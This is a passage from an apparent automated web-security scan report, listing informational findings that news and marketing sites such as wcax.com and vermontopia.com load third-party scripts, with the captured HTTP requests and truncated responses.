Date: Tue, 12 Apr 2011 15:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=a8d8e35751186e367b10f53a8a6cfc62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Templates/gene
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.55. http://www.mvtimes.com/marthas-vineyard/on-island.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/on-island.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marthas-vineyard/on-island.php HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/archives/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.3.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:16:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 34724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/genera
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.56. http://www.pagevester.com/en/product/Google-Website-Optimizer.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pagevester.com
Path:   /en/product/Google-Website-Optimizer.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/product/Google-Website-Optimizer.asp HTTP/1.1
Host: www.pagevester.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 00:18:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Vary: Cookie
X-Pingback: http://www.acquisio.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 09 Apr 2011 00:18:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.acquisio.com/wp-content/plugins/sociable/sociable.css?ver=3.0' type='text/css' media='all' />
<script type='text/javascript' src='http://www.acquisio.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.acquisio.com/wp-content/plugins/ilc-folding/folding.js?ver=3.0'></script>
<script type='text/javascript' src='http://www.acquisio.com/wp-content/plugins/DDSlider/js/jquery.DDSlider.min.js?ver=3.0'></script>
...[SNIP]...
</a>
                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=acquisio"></script>
...[SNIP]...
<!--end #footer-->
   

<script type='text/javascript' src='http://www.acquisio.com/wp-content/themes/acquisio/lib/js/menu/superfish.js?ver=1.4.8'></script>
<script type='text/javascript' src='http://www.acquisio.com/wp-content/themes/acquisio/lib/js/menu/superfish.args.js?ver=1.1.3'></script>
<script src="http://www.acquisio.com/js_capture_source/jquery-latest.js" type="text/javascript" ></script>
<script src="http://www.acquisio.com/js_capture_source/jquery.cookie.js" type="text/javascript" ></script>
<script src="http://www.acquisio.com/js_capture_source/jquery.getUrlParam.js" type="text/javascript"></script>
<script src="http://www.acquisio.com/js_capture_source/leadcapture.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
11.57. http://www.vermontopia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: PHPSESSID=6678b376dbff5b3ae1448508f8a7d7a3; path=/
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 31515


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</script>
       
       <script type="text/javascript" src="http://wcax.upickem.net/engine/includes/CountdownClock.js"></script>

                           <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
                               <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<br>
<script language="javascript" src="http://www.rss-info.com/rss2.php?integration=js&amp;windowopen=1&amp;rss=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D120144%26clienttype%3Drss&amp;number=5&amp;width=500&amp;ifbgcol=FFFFFF&amp;bordercol=D0D0D0&amp;textbgcol=F0F0F0&amp;rssbgcol=F0F0F0&amp;showrsstitle=1&amp;showtext=1"> </script>
...[SNIP]...
11.58. http://www.vermontopia.com/event/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /event/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /event/?L=408799&referrerDomain=www.wcax.com HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 23746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</script>
       
       <script type="text/javascript" src="http://wcax.upickem.net/engine/includes/CountdownClock.js"></script>

                           <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
                               <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.59. http://www.vermontopia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 12:28:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 15321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</script>
       
       <script type="text/javascript" src="http://wcax.upickem.net/engine/includes/CountdownClock.js"></script>

                           <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
                               <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
11.60. http://www.wcax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 76476
Expires: Sat, 09 Apr 2011 12:29:26 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:29:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ClientGroup=1; expires=Mon, 09-Apr-2012 04:00:00 GMT; path=/
Content-Length: 76476

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX.COM L
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.worldnow.com/global/interface/jq.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/checktimezone.js"></script>
<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/ellipses-function.js"></script>
<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/timeDifference.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.61. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/category.asp?C=18836 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352436393:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS54
P3P: CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 40024
Cache-Control: private, max-age=291
Expires: Sat, 09 Apr 2011 12:38:56 GMT
Date: Sat, 09 Apr 2011 12:34:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40024

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Contact Us
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.62. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/category.asp?C=68446 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352436393:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS11
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 68568
Cache-Control: private, max-age=279
Expires: Sat, 09 Apr 2011 12:38:44 GMT
Date: Sat, 09 Apr 2011 12:34:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 68568

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Lifestyle
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ftpcontent.worldnow.com/revenue/js/ellipses-function.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
<div id="financialcontentModule">
<script
src="http://studio-5.financialcontent.com/worldnow?Module=snapshot&OutputMode=JS"></script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.63. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/category.asp?C=18197 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352442619:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
wn: iis14
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 91623
Cache-Control: private, max-age=300
Date: Sat, 09 Apr 2011 12:34:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 91623

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Local News
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.worldnow.com/global/interface/jq.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
<div class="wnDVUtilityBlock"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.64. http://www.wcax.com/Global/link.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/link.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/link.asp?L=408799 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352293178:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS07
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 26034
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:34:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 26034

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX Vermo
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
11.65. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/story.asp?S=503137 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352522776:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
wn: IIS08
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 49209
Cache-Control: private, max-age=282
Expires: Sat, 09 Apr 2011 12:40:23 GMT
Date: Sat, 09 Apr 2011 12:35:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49209

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
